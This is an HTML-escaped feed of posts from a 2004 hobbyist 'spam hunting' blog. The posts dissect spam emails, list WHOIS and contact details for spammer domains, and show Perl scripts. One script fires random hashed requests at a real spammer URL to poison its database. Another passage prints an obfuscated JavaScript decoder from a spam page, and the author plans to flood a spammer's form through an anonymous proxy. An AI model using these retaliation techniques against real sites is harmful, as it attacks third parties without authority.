&lt;000001c497ad$83f4dc23$310f11c9@starmedia.com&gt;&lt;/span&gt;&lt;br /&gt;From: "Jas R. Chrian" &lt;kevon6hci com=""&gt;&lt;/kevon6hci&gt;&lt;/span&gt;&lt;br /&gt;To: John &lt;john&gt;&lt;/john&gt;&lt;/span&gt;&lt;br /&gt;Subject: Self milking girls&lt;/span&gt;&lt;br /&gt;Date: Fri, 10 Sep 2004 20:15:12 -0700&lt;/span&gt;&lt;br /&gt;MIME-Version: 1.0&lt;/span&gt;&lt;br /&gt;Content-Type: multipart/alternative;&lt;/span&gt;&lt;br /&gt;    boundary="----=_NextPart_000_0024_55E89199.1ABD4F86"&lt;/span&gt;&lt;br /&gt;X-Priority: 3&lt;/span&gt;&lt;br /&gt;X-MSMail-Priority: Normal&lt;/span&gt;&lt;br /&gt;X-Mailer: Microsoft Outlook Express 6.00.2800.4682&lt;/span&gt;&lt;br /&gt;X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006&lt;/span&gt;&lt;br /&gt;X-Virus-Scanned: by AMaViS perl-11 mion&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;there is no shortage of spammers to go after. I haven't even deployed my troll addresses yet but that will be covered in another post. This one is using the same targeting technique of hashes but this time it's embedded in the server name itself.&lt;/span&gt;&lt;br /&gt;Again the actual hashes have been modified but the number of characters is preserved&lt;/span&gt;&lt;br /&gt;http://Hereford.45839583945867393045.handicaps.hdhda.com/rd/eESw8odWRZ/mekl43WEBDeiw.htm&lt;/span&gt;&lt;br /&gt;I'll have to modify my falsePozi.pl script later to work for this scumbag. &lt;/span&gt;&lt;br /&gt;Hrm this one is a little tricker and I received a 404.  Must be something in the hashes that I messed up.  &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;OK let's work backwards here, inurl:hdhda.com didn't find anything on google.  but the whois revealed this&lt;/span&gt;&lt;br /&gt;&lt;map name="global"&gt;&lt;area shape="RECT" target="_top" alt="WHOIS" coords="3,5,47,21" href="http://www.blogger.com/en_US/whois/index.jhtml"&gt;&lt;area shape="RECT" target="_top" alt="VIEW YOUR ORDER" coords="53,4,127,21" href="http://www.blogger.com/en_US/purchase-it/view-your-order.jhtml?_DARGS=/en_US/droplets/SFStyles.jhtml.1_A&amp;_DAV="&gt;&lt;area shape="RECT" target="_top" alt="CUSTOMER SERVICE" coords="130,4,233,22" href="http://www.blogger.com/en_US/help/index.jhtml?_DARGS=/en_US/droplets/SFStyles.jhtml.2_A&amp;amp;_DAV="&gt;&lt;/map&gt; &lt;table cellspacing="0" cellpadding="0" width="749" border="0"&gt; &lt;tbody&gt;&lt;tr&gt;&lt;td align="right" width="100%"&gt;&lt;table cellspacing="0" cellpadding="0" width="749" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td valign="top" align="right" width="100%"&gt;&lt;table cellspacing="0" cellpadding="0" width="100%" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td valign="top" align="left"&gt;&lt;table cellspacing="0" cellpadding="0" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;table cellspacing="0" cellpadding="0" width="739" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;table cellspacing="0" cellpadding="0" width="100%" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td valign="top"&gt;&lt;table cellspacing="0" cellpadding="0" width="500" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="calltoaction-Boxborder" valign="top" colspan="3"&gt;&lt;table cellspacing="0" cellpadding="0" width="500" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td valign="top" width="523"&gt;&lt;table class="grayhairlinebox" cellspacing="0" cellpadding="5" width="100%" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td colspan="3"&gt;&lt;table cellspacing="0" cellpadding="0" width="100%" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt; &lt;/table&gt; &lt;map name="global"&gt;&lt;area shape="RECT" target="_top" alt="WHOIS" coords="3,5,47,21" href="http://www.blogger.com/en_US/whois/index.jhtml"&gt;&lt;area shape="RECT" target="_top" alt="VIEW YOUR ORDER" coords="53,4,127,21" href="http://www.blogger.com/en_US/purchase-it/view-your-order.jhtml?_DARGS=/en_US/droplets/SFStyles.jhtml.1_A&amp;_DAV="&gt;&lt;area shape="RECT" target="_top" alt="CUSTOMER SERVICE" coords="130,4,233,22" href="http://www.blogger.com/en_US/help/index.jhtml?_DARGS=/en_US/droplets/SFStyles.jhtml.2_A&amp;amp;_DAV="&gt;&lt;/map&gt; &lt;table cellspacing="0" cellpadding="0" width="749" border="0"&gt; &lt;tbody&gt;&lt;tr&gt;&lt;td align="right" width="100%"&gt;&lt;table cellspacing="0" cellpadding="0" width="749" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td valign="top" align="right" width="100%"&gt;&lt;table cellspacing="0" cellpadding="0" width="100%" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td valign="top" align="left"&gt;&lt;table cellspacing="0" cellpadding="0" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;table cellspacing="0" cellpadding="0" width="739" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;table cellspacing="0" cellpadding="0" width="100%" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td valign="top"&gt;&lt;table cellspacing="0" cellpadding="0" width="500" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="calltoaction-Boxborder" valign="top" colspan="3"&gt;&lt;table cellspacing="0" cellpadding="0" width="500" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td valign="top" width="523"&gt;&lt;table class="grayhairlinebox" cellspacing="0" cellpadding="5" width="100%" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td colspan="3"&gt;&lt;table cellspacing="0" cellpadding="0" width="100%" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt; &lt;/table&gt; Registrant:&lt;/span&gt;&lt;br /&gt; Masterly Intl S.A.&lt;/span&gt;&lt;br /&gt; Sabana sur&lt;/span&gt;&lt;br /&gt; 25mts al sur del&lt;/span&gt;&lt;br /&gt; Supermercado AM PM&lt;/span&gt;&lt;br /&gt; San Jose, CR --&lt;/span&gt;&lt;br /&gt; CR&lt;/span&gt;&lt;br /&gt; +011.5068246415 &lt;/span&gt;&lt;br /&gt;Fax:+011.5062722279&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Domain Name: HDHDA.COM&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Administrative Contact: &lt;/span&gt;&lt;br /&gt; Admin, Domain masterlyintl@hushmail.com&lt;/span&gt;&lt;br /&gt; Sabana sur&lt;/span&gt;&lt;br /&gt; 25mts al sur del&lt;/span&gt;&lt;br /&gt; Supermercado AM PM&lt;/span&gt;&lt;br /&gt; San Jose, CR --&lt;/span&gt;&lt;br /&gt; CR&lt;/span&gt;&lt;br /&gt; +011.5068246415 &lt;/span&gt;&lt;br /&gt;Fax:+011.5062722279&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Technical Contact: &lt;/span&gt;&lt;br /&gt; Admin, Domain masterlyintl@hushmail.com&lt;/span&gt;&lt;br /&gt; Sabana sur&lt;/span&gt;&lt;br /&gt; 25mts al sur del&lt;/span&gt;&lt;br /&gt; Supermercado AM PM&lt;/span&gt;&lt;br /&gt; San Jose, CR --&lt;/span&gt;&lt;br /&gt; CR&lt;/span&gt;&lt;br /&gt; +011.5068246415 &lt;/span&gt;&lt;br /&gt;Fax:+011.5062722279&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Record expires on 09-02-2005&lt;/span&gt;&lt;br /&gt;Record created on 09-02-2004&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Domain servers in listed order:&lt;/span&gt;&lt;br /&gt;    NS0.CLEANWEBFILES.COM    64.38.198.11&lt;/span&gt;&lt;br /&gt;    NS1.CLEANWEBFILES.COM    64.38.198.13&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;There was another URL in the email so let's try to work with that one&lt;/span&gt;&lt;br /&gt;http://exclamation.00000000000000000000.spotty.hdhda.com/rd/xxxxxxxxxx/xxxxxxxxxxxxxxxx.HTM&lt;/span&gt;&lt;br /&gt;OK this isn't work, so I went to usenet and found an an abuse posting that gave another address not linked to mine. So let's try it out instead&lt;/span&gt;&lt;br /&gt;http://Cecropia.321908402677499182.plead.&lt;/span&gt;&lt;b&gt;hdhda&lt;/b&gt;.&lt;/span&gt;&lt;b&gt;com&lt;br /&gt;&lt;/b&gt;another 404, I'm guessing because I don't have the hashes at the end of the URL.&lt;/span&gt;&lt;br /&gt;Bingo, got it!&lt;/span&gt;&lt;br /&gt;Another post had munged up the address and it still worked.&lt;/span&gt;&lt;br /&gt;http://unevaluated.530896695780071931.poodle.hdhda.com/rd/UrHaeRXA4a/yY389QLQcc5AbG1.HTML&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;the page lists itself as "HELMY Enterprises, Inc." althought I doubt this moron actually files papers and has a DBA. Just a guess though.&lt;/span&gt;&lt;br /&gt;there's an affliliate link on the bottom for http://www.gigacash.com which I'll check out later.  &lt;/span&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;the link to it is another candidate for falsePozi.pl&lt;br /&gt;http://www2.gigacash.com/popup/gc.php?gcaid=188234&amp;gcsa=default&lt;br /&gt;&lt;br /&gt;Helmy enterprises actually has a website if you can believe that.&lt;br /&gt;I've linked to the google cache to make this more discreet&lt;br /&gt;http://64.233.161.104/search?q=cache:VM3pMCl7uMAJ:helmy.com/+HELMY+Enterprises,+Inc.&amp;amp;hl=en&lt;br /&gt;Here is our scumbags email addy according to the site&lt;br /&gt;info2@helmy.com&lt;br /&gt;email@helmy.com&lt;br /&gt;&lt;br /&gt;The address is just a PO Box in Los Angeles&lt;b&gt;&lt;br /&gt;&lt;/b&gt; &lt;li&gt;&lt;span style=";font-family:Courier New,Courier,mono;font-size:85%;"&gt;US &amp; Canada:                  888.8.HELMYS &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=";font-family:Courier New,Courier,mono;font-size:85%;"&gt;International:                  310.820.0228&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=";font-family:Courier New,Courier,mono;font-size:85%;"&gt;PO BOX 492146,                  LA, CA 90049&lt;/span&gt;&lt;/li&gt;  OH wait it gets better, an employment page! Oh yes can I please work for you? I mean I have never had a job where I am considered by most to be the slime of the earth.&lt;/span&gt;&lt;br /&gt;Let's have some fun with this now.&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;Now the way most forms work is they have a bunch of fields and then there is an "action" field which tells you where it's going to go. This one requires only slightly more work in that it's using POST so I can't just make a big URL and shove it down his digital throat.&lt;br /&gt;In this case the relevent data is as follows&lt;br /&gt;&lt;br /&gt;            &amp;lt;form method="POST" action="FormMail.pl5"&amp;gt;&lt;br /&gt;            &amp;lt;input type="text" name="name" size="40" value=""&amp;gt;&lt;br /&gt;            &amp;lt;input type="text" name="email" size="40"&amp;gt;&lt;br /&gt;            &amp;lt;input type="text" name="phone" size="40"&amp;gt;&lt;br /&gt; &amp;lt;textarea name="comments" rows="5" cols="31"&amp;gt;&amp;lt;/textarea&amp;gt;&lt;br /&gt;             &amp;lt;input type=HIDDEN name="recipient" value="email@helmy.com"&amp;gt;&lt;br /&gt; &amp;lt;input type=HIDDEN name="subject" value="HELMY Employment Inquiry Form"&amp;gt;&lt;br /&gt; &amp;lt;input type=HIDDEN name="redirect" value="http://www.helmy.com"&amp;gt;&lt;br /&gt;              &amp;lt;input type=HIDDEN name="required" value="name, email"&amp;gt;&lt;br /&gt; &amp;lt;input type="submit" value="&amp;gt;&amp;gt; send" name="B12"&amp;gt;&lt;br /&gt;&lt;br /&gt;So this employment application goes right to his email. interesting, spamming a known spammer.. the irony is too much sometimes.&lt;/span&gt;&lt;br /&gt;alright let's get to work here, I need to create a modified HTTPsend.pl script so I can send in my work request. I'm also going to have to hide my request by going through an anonymous proxy so he doesn't just check his logs tomorrow and blag my IP address. It will all be documented in the next post so stay tuned (not that anyone is actually reading this).&lt;/span&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-109495672212271756?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/109495672212271756/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=109495672212271756' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/109495672212271756'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/109495672212271756'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2004/09/self-milking-girls.html' title='Self Milking Girls'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-109494882454828926</id><published>2004-09-11T20:05:00.000-04:00</published><updated>2004-09-11T20:27:04.546-04:00</updated><title type='text'>Creating false positives for spammers</title><content type='html'>Since he is trying to figure out who is "live" in his spam rolodex let's have a little fun.&lt;br /&gt;The first tool to use would be a random text generator or in this case a simple encoder.&lt;br /&gt;We don't need truely random here so Mime64 encoded using localtime() output will work just fine.&lt;br /&gt;&lt;span style="font-family: monospace;"&gt;&lt;br /&gt;&lt;br /&gt;So here is what I came up with for blingcash so far&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl -w&lt;br /&gt;use strict;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;use MIME::Base64;&lt;br /&gt;&lt;br /&gt;my $text= "spammersuck";&lt;br /&gt;&lt;br /&gt;# Create a user agent object&lt;br /&gt;my $ua = LWP::UserAgent-&gt;new;&lt;br /&gt;$ua-&gt;agent("Mozilla/8.0"); # pretend we are very capable browser :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;my $baseURL='http://birdgenus.com/web09.php/';&lt;br /&gt;&lt;br /&gt;sub getPage&lt;br /&gt;{&lt;br /&gt;    my $key = localtime();&lt;br /&gt;    #removing anything that is not a digit&lt;br /&gt;    $key=~s/\D//g;&lt;br /&gt;    $key=rand($key);&lt;br /&gt;    my $encoded = encode_base64("$key:$text");&lt;br /&gt;&lt;br /&gt;    #original email had a 16 char hash so just making sure mine is similar&lt;br /&gt;    my $hash=substr($encoded,0,15);&lt;br /&gt;   &lt;br /&gt;    my $req = HTTP::Request-&gt;new(GET =&gt; $baseURL.$hash);&lt;br /&gt;    $req-&gt;header('Accept' =&gt; 'text/html');&lt;br /&gt;&lt;br /&gt;    # Pass request to the user agent and get a response back&lt;br /&gt;    my $res = $ua-&gt;request($req);&lt;br /&gt;   &lt;br /&gt;    # Check the outcome of the response&lt;br /&gt;    if ($res-&gt;is_success) {&lt;br /&gt;        print $hash . " " .$res-&gt;status_line . "\n";&lt;br /&gt;    }&lt;br /&gt;    else {&lt;br /&gt;        print "Error: " . $res-&gt;as_string . "\n" if ($res-&gt;status_line!~/404/);&lt;br /&gt;    }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;foreach my $try (1..5)&lt;br /&gt;{&lt;br /&gt;    getPage();&lt;br /&gt;}   &lt;br /&gt;&lt;/span&gt; &lt;pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-109494882454828926?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/109494882454828926/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=109494882454828926' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/109494882454828926'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/109494882454828926'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2004/09/creating-false-positives-for-spammers.html' title='Creating false positives for spammers'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-109494742605539538</id><published>2004-09-11T19:51:00.000-04:00</published><updated>2005-03-23T00:39:00.060-05:00</updated><title type='text'>hey from teenie</title><content type='html'>New format here, I will post the headers first and the results afterwards.  This may make it easier later on if this blog ever gets viewed by another person.&lt;br /&gt;Return-Path: &lt;teeniefgcd@megamarge.com&gt;&lt;br /&gt;Delivered-To: john@&lt;br /&gt;Received: (qmail 17769 invoked from network); 11 Sep 2004 16:17:26 -0000&lt;br /&gt;Received: from unknown (HELO felicite.kwiksuzie.com) (209.200.9.148)&lt;br /&gt;  by 2.69-93-235.reverse.theplanet.com with SMTP; 11 Sep 2004 16:17:26 -0000&lt;br /&gt;Received: from mail pickup service by megamarge.com with Microsoft SMTPSVC;&lt;br /&gt;     Sun, 12 Sep 2004 00:05:26 -0800&lt;br /&gt;Received: from 197.208.117.20 by by7fd.bay7.megamarge.com with HTTP;&lt;br /&gt;    Sun, 12 Sep 2004 00:05:26 GMT&lt;br /&gt;X-Originating-IP: [197.208.117.20]&lt;br /&gt;X-Originating-Email: [teeniefgcd@megamarge.com]&lt;br /&gt;X-Sender: teeniefgcd@megamarge.com&lt;br /&gt;From: teenie &lt;teeniefgcd@megamarge.com&gt;&lt;br /&gt;To: John &lt;john@&gt;&lt;br /&gt;Subject: hey&lt;br /&gt;Date: 12 Sep 2004 00:05:26 -0400&lt;br /&gt;Mime-Version: 1.0&lt;br /&gt;Content-type: text/html&lt;br /&gt;Message-ID: &lt;sr4-a8400b275660dac9d8e5f4d8f7433c61@megamarge.com&gt;&lt;br /&gt;Return-Path: &lt;teeniefgcd@megamarge.com&gt;&lt;br /&gt;&lt;br /&gt;This spammer is using the same type of stealthing techniques, random dictionary words, url encoding and a targeted URL.&lt;br /&gt;&lt;br /&gt;the URL's are designed to tie back to the email address like a hash.  In fact this probobly is a hashed value which is tied to a database entry. &lt;br /&gt;&lt;span style="font-weight: bold;"&gt;http://birdgenus.com/web09.php/REWDgUhozXE482E&lt;br /&gt;I've obviously changed this value around a little.  In fact one of the perl scripts I love using makes random values which will cause lots of false positives in their database. &lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Hrm the result looks awefully familiar.  Just like the one I saw in my first post.  It may even be the exact same person respamming me.  It's not like these spammers have morals or ethics.&lt;br /&gt;Ya it's the same guy from http://www.blingcash.com.  I used the same technique as last time, take the script shown below and change document.write to alert and view the content safely.&lt;br /&gt;I've been thinking of changing to this to populating a text field so I can easily cut and past the results.&lt;br /&gt;&lt;form&gt;&lt;br /&gt;&lt;textarea cols=80 rows=5&gt;&lt;br /&gt;&amp;lt;script language=JavaScript&amp;gt;function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,20,2,21,43,60,61,62,6,42,0,0,0,0,0,0,34,50,52,1,46,59,17,4,57,56,26,27,15,39,25,12,10,18,7,58,54,47,40,28,9,41,49,0,0,0,0,51,0,55,13,36,35,16,23,0,3,44,30,45,19,24,32,33,37,5,11,31,38,8,14,48,53,22,29);for(j=Math.ceil(l/b);j&amp;gt;0;j--){r='';for(i=Math.min(l,b);i&amp;gt;0;i--,l--){w|=(t[x.charCodeAt(p++)-48])&amp;lt;&amp;lt;s;if(s){r+=String.fromCharCode(165^w&amp;255);w&amp;gt;&amp;gt;=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("NTWBuM5tUtNBORzAgUXZR4OBF0HZXl5AvMY@F_WBXh5tUtHIalvSnKLIZfIxPrkxmjmpX7IoqjiAfROwfdNpqv5xGdOwR45xCh5xmyNohsbZuhix3liZOUiwmyNoPUWSPlWwmjVSR0OtPfbwraVnbRzB30Y@PPkBQUIZX_5A2KOZya5@84OAP2WaORk@gak@2tmo22WaORknXPmBP4WARl5xmyN@uh5AesOZfdNpXJkZf4WAXsOZfKbt1tmAPKOZF_iArdXpXJzBGRbBydXpXjbwy_5aGsWAgdXpX8kA3dNpXtOwhRbt3tVBORWBbdNM3yN@bhO_2aWBmvNp3tVx8sbwgUW0mQN@yK5xgh5A5dXp2AVM9s5_rjWAeszdOSHoK7JtdsLHVhjoyskZmjuZR4OBF0HZXl5AvsmorlOAgdHo34WxRyIwflOAgsiAfROwfdNpq@OZfrO_rrb_CRz_myNoul5x2_5AbhO_2aWBmyNor45xgKb_sh5tUtHIalvSnfVxfKOtRTWBFf6MP9VBQr6@RMO_rriZGKz_rJiAu4m_OR6@3aWxJPbt1yNp3yNphJbtzvmxmjHoqDOZuhOtRP6oqv5xGdOwR45xCh5xmyNoul5x2_5AQ_WwFaOt3yuAGskwOUW_g_iwbRbt3yIAPsbwy_5agUH4N9IIalvSnKLIZUH4N9m_FdWAK2")&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;/textarea&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;I've already covered blingcash.com so let's move on to another one.&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-109494742605539538?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/109494742605539538/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=109494742605539538' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/109494742605539538'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/109494742605539538'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2004/09/hey-from-teenie.html' title='hey from teenie'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-109494626140014241</id><published>2004-09-11T19:37:00.000-04:00</published><updated>2004-09-11T19:44:21.400-04:00</updated><title type='text'>my methods</title><content type='html'>I wanted to spend some time documenting my methods.  I only use freeware tools at this point such as perl, outlook express and vim.&lt;br /&gt;Outlook Express is my collector, it is cofigured for the catch all address of my domain.  For every oddball site I've ever gone to I would enter a custom email.  In one case MPCMag who offered free magazine subscriptions the spam would get sent to MPCMag@mydomain.com&lt;br /&gt;Once the spams are in my inbox (with previewing turned off of course) I would simply click on the file and hold, drag it onto my desktop and then edit the file using vim.  Vim is VI improved for those who don't know and is a great free text editor. &lt;br /&gt;The non free tool I use to speed things up are Komodo a fantastic perl IDE I purchased a year ago from Activestate (now Sophos).  I could do without it but I really love the tool and it is nice when I'm coding to have an interactive debugger like this handy.&lt;br /&gt;&lt;br /&gt;The normal mode of operation here is to find a page of entry which is usually in the email itself and then download the page in my perl script.  This prevents any nasty activeX or other surprises from infecting me.  In linux I would use curl for this of course. &lt;br /&gt;Here is a sample perl script I use.&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;use strict;&lt;br /&gt;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;&lt;br /&gt;# Create a user agent object&lt;br /&gt;my $ua = LWP::UserAgent-&gt;new;&lt;br /&gt;# $ua-&gt;agent("$0/0.1 " . $ua-&gt;agent);&lt;br /&gt;$ua-&gt;agent("Mozilla/8.0"); # pretend we are very capable browser :)&lt;br /&gt;my $counter;&lt;br /&gt;# Initialize proxy settings from environment variables&lt;br /&gt;$ua-&gt;env_proxy;&lt;br /&gt;my @dictionary;&lt;br /&gt;# Create a request&lt;br /&gt;&lt;br /&gt;# this is an actual spammer URL that was sent to a troll account&lt;br /&gt;my $baseURL='http://www.ad0u.com/maildeny.php';&lt;br /&gt;&lt;br /&gt;sub getPage&lt;br /&gt;{&lt;br /&gt;    my $req = HTTP::Request-&gt;new(GET =&gt; $baseURL);&lt;br /&gt;    $req-&gt;header('Accept' =&gt; 'text/html');&lt;br /&gt;   &lt;br /&gt;    # Pass request to the user agent and get a response back&lt;br /&gt;    my $res = $ua-&gt;request($req);&lt;br /&gt;   &lt;br /&gt;    # Check the outcome of the response&lt;br /&gt;    if ($res-&gt;is_success) {&lt;br /&gt;        print $res-&gt;content;&lt;br /&gt;    }&lt;br /&gt;    else {&lt;br /&gt;        print "Error: " . $res-&gt;status_line . "\n" if ($res-&gt;status_line!~/404/);&lt;br /&gt;    }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;getPage();&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-109494626140014241?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/109494626140014241/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=109494626140014241' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/109494626140014241'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/109494626140014241'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2004/09/my-methods.html' title='my methods'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-109470486862410835</id><published>2004-09-09T00:15:00.000-04:00</published><updated>2005-03-23T00:40:40.440-05:00</updated><title type='text'>First Post</title><content type='html'>Spam Hunting is a new sport I've decided to engage in. I know of others who do this in one way or another. Some play as dirty as the spammers but since I'm cataloging this I'll obviously stay clean.&lt;br /&gt;My first piece of spam was from a bounce account on my domain. Bounce accounts are accounts friends used to have on my domain and have discontinued. But the spammers don't know that and still send junk their way. There is a lot of cat and mouse games with these scum such as encrypting pages using scripts.&lt;br /&gt;Our first came in a strange letter that just said Hi in the subject.&lt;br /&gt;[note: for obvious reasons I removed the address of the recipient but feel free to spam the spammer :) ]&lt;br /&gt;the actual text of the message is encoded using HTML encoding (&amp;xx;) with random dictionary words peppered in comment tags. It points to a site http://goedog.com/&lt;br /&gt;&lt;br /&gt;So I fire up my trusty perl debugger from and pull down the page. I would use curl if I had my linux box up but I'm at my work laptop so windows it is.&lt;br /&gt;The result is a single line of javascript with an encoded page. It's meant to keep prying eyes away from the inner workings. Pretty lame though. So I paste this into my HTML editor and change a single piece. Instead of document.write now it will use document.alert. So the HTML will not render but show up in a pop up box.&lt;br 